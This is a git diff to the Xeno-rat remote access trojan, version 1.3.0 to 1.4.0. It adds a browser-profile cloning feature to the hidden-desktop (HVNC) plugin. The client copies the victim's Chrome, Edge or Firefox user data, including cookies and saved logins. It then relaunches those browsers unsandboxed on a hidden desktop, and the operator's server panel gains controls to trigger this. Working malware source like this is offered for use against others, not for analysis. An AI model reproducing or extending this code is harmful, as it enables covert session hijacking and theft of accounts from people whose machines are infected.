diff --git a/Plugins/Hvnc/Hvnc.cs b/Plugins/Hvnc/Hvnc.cs index c7071ae..223cb8a 100644 --- a/Plugins/Hvnc/Hvnc.cs +++ b/Plugins/Hvnc/Hvnc.cs @@ -11,6 +11,8 @@ using System.Drawing.Imaging; using System.Runtime.InteropServices; using System.Windows.Forms; +using System.Management; +using System.Diagnostics; namespace Plugin { @@ -19,6 +21,13 @@ public class Main Node ImageNode; bool playing = false; int quality = 100; + bool do_browser_clone = false; + bool cloning_chrome = false; + bool cloning_firefox = false; + bool cloning_edge = false; + bool has_clonned_chrome = false; + bool has_clonned_firefox=false; + bool has_clonned_edge = false; Imaging_handler ImageHandler; input_handler InputHandler; Process_Handler ProcessHandler; @@ -65,7 +74,7 @@ public async Task Run(Node node) IntPtr lParam = (IntPtr)node.sock.BytesToInt(await node.ReceiveAsync()); new Thread(() => InputHandler.Input(msg, wParam, lParam)).Start(); } - else if (data[0] == 4) + else if (data[0] == 4) { ProcessHandler.StartExplorer(); } @@ -73,6 +82,52 @@ public async Task Run(Node node) { ProcessHandler.CreateProc(Encoding.UTF8.GetString(await node.ReceiveAsync())); } + else if (data[0] == 6) + { + do_browser_clone = true; + } + else if (data[0] == 7) + { + do_browser_clone = false; + } + else if (data[0] == 8) + { //start chrome + if (do_browser_clone && !has_clonned_chrome) + { + has_clonned_chrome = true; + HandleCloneChrome(); + } + else + { + ProcessHandler.StartChrome(); + } + } + else if (data[0] == 9) + { //start firefox + if (do_browser_clone && !has_clonned_firefox) + { + has_clonned_firefox = true; + HandleCloneFirefox(); + + } + else + { + ProcessHandler.StartFirefox(); + } + } + else if (data[0] == 10) + { //start edge + if (do_browser_clone && !has_clonned_edge) + { + has_clonned_edge = true; + HandleCloneEdge(); + + } + else + { + ProcessHandler.StartEdge(); + } + } } } catch @@ -86,6 +141,111 @@ public async Task Run(Node node) GC.Collect(); } + + private async Task GetProcessViaCommandLine(string processName, string searchString) { + return await Task.Run(() => + { + ManagementObjectSearcher searcher = new ManagementObjectSearcher($"SELECT * FROM Win32_Process WHERE Name = '{processName}'"); + + foreach (ManagementObject obj in searcher.Get()) + { + string commandLine = obj["CommandLine"]?.ToString(); + + if (commandLine != null && commandLine.Contains(searchString)) + { + return Convert.ToInt32(obj["ProcessId"]); + } + } + + return -1; + }); + } + + + private async Task HandleCloneChrome() + { + if (!cloning_chrome) + { + cloning_chrome = true; + try + { + await ProcessHandler.CloneChrome(); + } + catch + { + int pid = await GetProcessViaCommandLine("chrome.exe", "ChromeAutomationData"); + if (pid != -1) + { + Process p = Process.GetProcessById(pid); + try + { + p.Kill(); + await ProcessHandler.CloneChrome(); + } + catch { } + p.Dispose(); + } + } + ProcessHandler.StartChrome(); + cloning_chrome = false; + } + } + private async Task HandleCloneFirefox() + { + if (!cloning_firefox) + { + cloning_firefox = true; + try + { + await ProcessHandler.CloneFirefox(); + } + catch + { + int pid = await GetProcessViaCommandLine("firefox.exe", "FirefoxAutomationData"); + if (pid != -1) + { + Process p = Process.GetProcessById(pid); + try + { + p.Kill(); + await ProcessHandler.CloneFirefox(); + } + catch { } + p.Dispose(); + } + } + ProcessHandler.StartFirefox(); + cloning_firefox = false; + } + } + private async Task HandleCloneEdge() + { + if (!cloning_edge) + { + cloning_edge = true; + try + { + await ProcessHandler.CloneEdge(); + } + catch + { + int pid = await GetProcessViaCommandLine("msedge.exe", "EdgeAutomationData"); + if (pid != -1) + { + Process p = Process.GetProcessById(pid); + try + { + p.Kill(); + await ProcessHandler.CloneEdge(); + } + catch { } + p.Dispose(); + } + } + ProcessHandler.StartEdge(); + cloning_edge = false; + } + } public async Task ScreenShotThread() { try diff --git a/Plugins/Hvnc/Hvnc.csproj b/Plugins/Hvnc/Hvnc.csproj index af92dbe..6144588 100644 --- a/Plugins/Hvnc/Hvnc.csproj +++ b/Plugins/Hvnc/Hvnc.csproj @@ -35,6 +35,7 @@ + diff --git a/Plugins/Hvnc/Process Handler.cs b/Plugins/Hvnc/Process Handler.cs index ea87fac..1120170 100644 --- a/Plugins/Hvnc/Process Handler.cs +++ b/Plugins/Hvnc/Process Handler.cs @@ -6,6 +6,7 @@ using System.Linq; using System.Runtime.InteropServices; using System.Text; +using System.Threading; using System.Threading.Tasks; using xeno_rat_client; @@ -89,6 +90,219 @@ public bool StartExplorer() return CreateProc(@"C:\Windows\explorer.exe"); } + public string getChromePath() + { + + var path = Registry.GetValue(@"HKEY_CLASSES_ROOT\ChromeHTML\shell\open\command", null, null) as string; + if (path != null) + { + var split = path.Split('\"'); + path = split.Length >= 2 ? split[1] : null; + } + return path; + } + + public string GetEdgePath() + { + string edgeRegistryPath = @"SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\msedge.exe"; + + using (RegistryKey key = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64).OpenSubKey(edgeRegistryPath)) + { + if (key != null) + { + object edgePathObj = key.GetValue(""); + + if (edgePathObj != null) + { + return edgePathObj.ToString(); + } + } + } + + return null; + } + public string GetFirefoxPath() + { + string firefoxRegistryPath = @"SOFTWARE\Mozilla\Mozilla Firefox"; + + using (RegistryKey key = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64).OpenSubKey(firefoxRegistryPath)) + { + if (key != null) + { + object firefoxPathObj = key.GetValue("CurrentVersion"); + + if (firefoxPathObj != null) + { + string currentVersion = firefoxPathObj.ToString(); + string pathKey = $@"SOFTWARE\Mozilla\Mozilla Firefox\{currentVersion}\Main"; + + using (RegistryKey pathSubKey = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64).OpenSubKey(pathKey)) + { + if (pathSubKey != null) + { + object pathValue = pathSubKey.GetValue("PathToExe"); + + if (pathValue != null) + { + return pathValue.ToString(); + } + } + } + } + } + } + return null; + } + public bool StartChrome() + { + string dataDir = @"C:\ChromeAutomationData"; + string path = getChromePath(); + if (path == null || !File.Exists(path)) + { + return false; + } + return CreateProc("\"" + path + "\"" + " --no-sandbox --allow-no-sandbox-job --disable-gpu --user-data-dir="+dataDir); + } + + public bool StartEdge() + { + string dataDir = @"C:\EdgeAutomationData"; + string path = GetEdgePath(); + if (path == null || !File.Exists(path)) + { + return false; + } + return CreateProc("\"" + path + "\"" + " --no-sandbox --allow-no-sandbox-job --disable-gpu --user-data-dir=" + dataDir); + } + + public bool StartFirefox() + { + string dataDir = @"C:\FirefoxAutomationData"; + string path = GetFirefoxPath(); + if (path == null || !File.Exists(path)) + { + return false; + } + return CreateProc("\"" + path + "\"" + " -no-remote -profile " + dataDir); + } + + public async Task CloneChrome() + { + try + { + string dataDir = @"C:\ChromeAutomationData"; + string source = $@"C:\Users\{Environment.UserName}\AppData\Local\Google\Chrome\User Data"; + await Task.Run(() => Directory.Delete(dataDir, true)); + Directory.CreateDirectory(dataDir); + await CopyDirAsync(source, dataDir); + return true; + + } + catch { } + return false; + } + + public async Task CloneFirefox() + { + try + { + string profilesPath = $@"C:\Users\{Environment.UserName}\AppData\Roaming\Mozilla\Firefox\Profiles"; + string fileInDirectory = "addons.json"; + string source=RecursiveFileSearch(profilesPath, fileInDirectory); + if (source == null) + { + return false; + } + string dataDir = @"C:\FirefoxAutomationData"; + await Task.Run(() => Directory.Delete(dataDir, true)); + Directory.CreateDirectory(dataDir); + await CopyDirAsync(source, dataDir); + return true; + + } + catch { } + return false; + } + + public async Task CloneEdge() + { + try + { + string dataDir = @"C:\EdgeAutomationData"; + string source = $@"C:\Users\{Environment.UserName}\AppData\Local\Microsoft\Edge\User Data"; + await Task.Run(()=>Directory.Delete(dataDir, true)); + Directory.CreateDirectory(dataDir); + await CopyDirAsync(source, dataDir); + return true; + + } + catch { } + return false; + } + static string RecursiveFileSearch(string currentDirectory, string targetFileName) + { + string targetFilePath = Path.Combine(currentDirectory, targetFileName); + if (File.Exists(targetFilePath)) + { + return currentDirectory; + } + foreach (string subdirectory in Directory.GetDirectories(currentDirectory)) + { + string result = RecursiveFileSearch(subdirectory, targetFileName); + if (result != null) + { + return result; + } + } + return null; + } + + public async Task CopyDirAsync(string sourceDir, string destinationDir) + { + await CopyDirectoriesAsync(sourceDir, destinationDir); + + IEnumerable files = Directory.EnumerateFiles(sourceDir, "*", SearchOption.AllDirectories); + await CopyFilesInParallelAsync(files, sourceDir, destinationDir, maxParallelism: 10); // Set your desired parallelism limit + } + + private async Task CopyDirectoriesAsync(string sourceDir, string destinationDir) + { + IEnumerable directories = Directory.EnumerateDirectories(sourceDir, "*", SearchOption.AllDirectories); + + foreach (string dir in directories) + { + string relativePath = dir.Substring(sourceDir.Length + 1); + string destinationPath = Path.Combine(destinationDir, relativePath); + + await Task.Run(() => Directory.CreateDirectory(destinationPath)); + } + } + + private static async Task CopyFilesInParallelAsync(IEnumerable files, string sourceDir, string destinationDir, int maxParallelism) + { + var semaphore = new SemaphoreSlim(maxParallelism); + + async Task CopyFileAsync(string filePath) + { + string relativePath = filePath.Substring(sourceDir.Length + 1); + string destinationPath = Path.Combine(destinationDir, relativePath); + + try + { + await semaphore.WaitAsync(); + await Task.Run(() => File.Copy(filePath, destinationPath, true)); + } + finally + { + semaphore.Release(); + } + } + + var copyTasks = files.Select(CopyFileAsync).ToArray(); + + await Task.WhenAll(copyTasks); + } + public bool CreateProc(string filePath) { STARTUPINFO si = new STARTUPINFO(); diff --git a/xeno rat client/DllHandler.cs b/xeno rat client/DllHandler.cs index 7b00141..98c3d09 100644 --- a/xeno rat client/DllHandler.cs +++ b/xeno rat client/DllHandler.cs @@ -40,8 +40,8 @@ public async Task DllNodeHandler(Node subServer) } catch (Exception e) { - Console.WriteLine(e.Message); await subServer.SendAsync(fail); + await subServer.SendAsync(Encoding.UTF8.GetBytes(e.Message)); } } } diff --git a/xeno rat client/Handler.cs b/xeno rat client/Handler.cs index 755e4fc..d27e3ed 100644 --- a/xeno rat client/Handler.cs +++ b/xeno rat client/Handler.cs @@ -57,7 +57,7 @@ private async Task GetAndSendInfo(Node Type0) return; } //get hwid, username etc. seperated by null - string clientversion = "1.3.0";//find a way to get the client version. + string clientversion = "1.4.0";//find a way to get the client version. string[] info = new string[] { Utils.HWID(), Environment.UserName , clientversion, Utils.GetWindowsVersion(), Utils.GetAntivirus(), Utils.IsAdmin().ToString() }; byte[] data = new byte[0]; byte[] nullbyte = new byte[] { 0 }; diff --git a/xeno rat server/Forms/Hvnc.Designer.cs b/xeno rat server/Forms/Hvnc.Designer.cs index efbcf5a..5a8bf40 100644 --- a/xeno rat server/Forms/Hvnc.Designer.cs +++ b/xeno rat server/Forms/Hvnc.Designer.cs @@ -40,6 +40,7 @@ private void InitializeComponent() this.button7 = new System.Windows.Forms.Button(); this.button8 = new System.Windows.Forms.Button(); this.button9 = new System.Windows.Forms.Button(); + this.checkBox1 = new System.Windows.Forms.CheckBox(); ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit(); this.SuspendLayout(); // @@ -166,11 +167,24 @@ private void InitializeComponent() this.button9.UseVisualStyleBackColor = true; this.button9.Click += new System.EventHandler(this.button9_Click); // + // checkBox1 + // + this.checkBox1.AutoSize = true; + this.checkBox1.Enabled = false; + this.checkBox1.Location = new System.Drawing.Point(1049, 852); + this.checkBox1.Name = "checkBox1"; + this.checkBox1.Size = new System.Drawing.Size(126, 17); + this.checkBox1.TabIndex = 11; + this.checkBox1.Text = "Browser Clone Profile"; + this.checkBox1.UseVisualStyleBackColor = true; + this.checkBox1.CheckedChanged += new System.EventHandler(this.checkBox1_CheckedChanged); + // // Hvnc // this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F); this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; this.ClientSize = new System.Drawing.Size(1924, 888); + this.Controls.Add(this.checkBox1); this.Controls.Add(this.button9); this.Controls.Add(this.button8); this.Controls.Add(this.button7); @@ -187,6 +201,7 @@ private void InitializeComponent() this.Load += new System.EventHandler(this.Hvnc_Load); ((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit(); this.ResumeLayout(false); + this.PerformLayout(); } @@ -203,5 +218,6 @@ private void InitializeComponent() private System.Windows.Forms.Button button7; private System.Windows.Forms.Button button8; private System.Windows.Forms.Button button9; + private System.Windows.Forms.CheckBox checkBox1; } } \ No newline at end of file diff --git a/xeno rat server/Forms/Hvnc.cs b/xeno rat server/Forms/Hvnc.cs index e88d815..9e59bae 100644 --- a/xeno rat server/Forms/Hvnc.cs +++ b/xeno rat server/Forms/Hvnc.cs @@ -19,6 +19,7 @@ public partial class Hvnc : Form Node ImageNode; string DesktopName = "hidden_desktop"; bool playing = false; + bool is_clonning_browser = false; string[] qualitys = new string[] { "100%", "90%", "80%", "70%", "60%", "50%", "40%", "30%", "20%", "10%" }; CustomPictureBox customPictureBox1; public Hvnc(Node _client) @@ -122,6 +123,39 @@ private async Task StartProc(string path) await client.SendAsync(new byte[] { 5 }); await client.SendAsync(Encoding.UTF8.GetBytes(path)); } + + private async Task EnableBrowserClone() + { + if (!playing || is_clonning_browser) return; + await client.SendAsync(new byte[] { 6 }); + is_clonning_browser = true; + } + private async Task DisableBrowserClone() + { + if (!playing || !is_clonning_browser) return; + await client.SendAsync(new byte[] { 7 }); + is_clonning_browser = false; + } + + private async Task StartChrome() + { + if (!playing) return; + await client.SendAsync(new byte[] { 8 }); + } + + private async Task StartFirefox() + { + if (!playing) return; + await client.SendAsync(new byte[] { 9 }); + } + + private async Task StartEdge() + { + if (!playing) return; + await client.SendAsync(new byte[] { 10 }); + } + + private async Task CreateImageNode() { if (ImageNode != null) @@ -158,6 +192,7 @@ private void Hvnc_Load(object sender, EventArgs e) private async void button1_Click(object sender, EventArgs e) { //start + checkBox1.Enabled = true; await start(); button1.Enabled = false; playing = true; @@ -166,6 +201,7 @@ private async void button1_Click(object sender, EventArgs e) private async void button2_Click(object sender, EventArgs e) { //stop + checkBox1.Enabled = false; await stop(); button1.Enabled = true; playing = false; @@ -202,17 +238,29 @@ private async void button4_Click(object sender, EventArgs e) private async void button5_Click(object sender, EventArgs e) { - await StartProc("\"" + @"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" + "\"" + @" --no-sandbox --allow-no-sandbox-job --disable-gpu --user-data-dir=C:\AutomationUser"); + await StartEdge(); + if (is_clonning_browser) + { + new Thread(()=>MessageBox.Show("It can take a while to clone the profile data, if the browser doesnt launch, please wait...")).Start(); + } } private async void button6_Click(object sender, EventArgs e) { - await StartProc("\"" + @"C:\Program Files\Google\Chrome\Application\chrome.exe" + "\"" + @" --no-sandbox --allow-no-sandbox-job --disable-gpu --user-data-dir=C:\AutomationUser"); + await StartChrome(); + if (is_clonning_browser) + { + new Thread(() => MessageBox.Show("It can take a while to clone the profile data, if the browser doesnt launch, please wait...")).Start(); + } } private async void button7_Click(object sender, EventArgs e) { - await StartProc("\"" + @"C:\Program Files\Mozilla Firefox\firefox.exe" + "\"" + @" -no-remote -profile C:\AutomationUser"); + await StartFirefox(); + if (is_clonning_browser) + { + new Thread(() => MessageBox.Show("It can take a while to clone the profile data, if the browser doesnt launch, please wait...")).Start(); + } } private async void button8_Click(object sender, EventArgs e) @@ -229,6 +277,19 @@ private void pictureBox1_Click(object sender, EventArgs e) { } + + private async void checkBox1_CheckedChanged(object sender, EventArgs e) + { + if (!playing) return; + if (checkBox1.Checked) + { + await EnableBrowserClone(); + } + else + { + await DisableBrowserClone(); + } + } } diff --git a/xeno rat server/MainForm.Designer.cs b/xeno rat server/MainForm.Designer.cs index 2bb17fc..d35a26c 100644 --- a/xeno rat server/MainForm.Designer.cs +++ b/xeno rat server/MainForm.Designer.cs @@ -231,6 +231,7 @@ private void InitializeComponent() this.listView3.Columns.AddRange(new System.Windows.Forms.ColumnHeader[] { this.columnHeader11, this.columnHeader12}); + this.listView3.FullRowSelect = true; this.listView3.GridLines = true; this.listView3.HideSelection = false; this.listView3.Location = new System.Drawing.Point(4, 0); @@ -239,6 +240,8 @@ private void InitializeComponent() this.listView3.TabIndex = 0; this.listView3.UseCompatibleStateImageBehavior = false; this.listView3.View = System.Windows.Forms.View.Details; + this.listView3.SelectedIndexChanged += new System.EventHandler(this.listView3_SelectedIndexChanged); + this.listView3.MouseClick += new System.Windows.Forms.MouseEventHandler(this.listView3_MouseClick); // // columnHeader11 // diff --git a/xeno rat server/MainForm.cs b/xeno rat server/MainForm.cs index b1e51d6..c562020 100644 --- a/xeno rat server/MainForm.cs +++ b/xeno rat server/MainForm.cs @@ -48,7 +48,7 @@ public MainForm() { InitializeComponent(); - this.Text = "Xeno-rat: Created by moom825 - version 1.3.0"; + this.Text = "Xeno-rat: Created by moom825 - version 1.4.0"; key = Utils.CalculateSha256Bytes(string_key); ListeningHandler =new Listener(OnConnect); @@ -1588,6 +1588,26 @@ private void richTextBox1_TextChanged(object sender, EventArgs e) { } + + private void listView3_SelectedIndexChanged(object sender, EventArgs e) + { + + } + + private void listView3_MouseClick(object sender, MouseEventArgs e) + { + if (e.Button == MouseButtons.Right && listView3.SelectedItems.Count > 0) + { + string selectedValue = listView3.SelectedItems[0].SubItems[0].Text+": "+ listView3.SelectedItems[0].SubItems[1].Text; + + ContextMenu contextMenu = new ContextMenu(); + MenuItem copyMenuItem = new MenuItem("Copy"); + copyMenuItem.Click += (s, args) => Clipboard.SetText(selectedValue); + contextMenu.MenuItems.Add(copyMenuItem); + + contextMenu.Show(listView3, e.Location); + } + } } public static class IconInjector { diff --git a/xeno rat server/Utils.cs b/xeno rat server/Utils.cs index 02e8811..e49eb5a 100644 --- a/xeno rat server/Utils.cs +++ b/xeno rat server/Utils.cs @@ -102,9 +102,11 @@ public static async Task LoadDllAsync(Node clientsubsock, string dllname, byte[] dllloadinfo = await clientsubsock.ReceiveAsync(); if (dllloadinfo[0] != 3) { + byte[] errorMessage = await clientsubsock.ReceiveAsync(); if (Logcallback != null) { Logcallback($"Starting {dllname} dll failed !", Color.Red); + Logcallback(Encoding.UTF8.GetString(errorMessage), Color.Red); } return false; }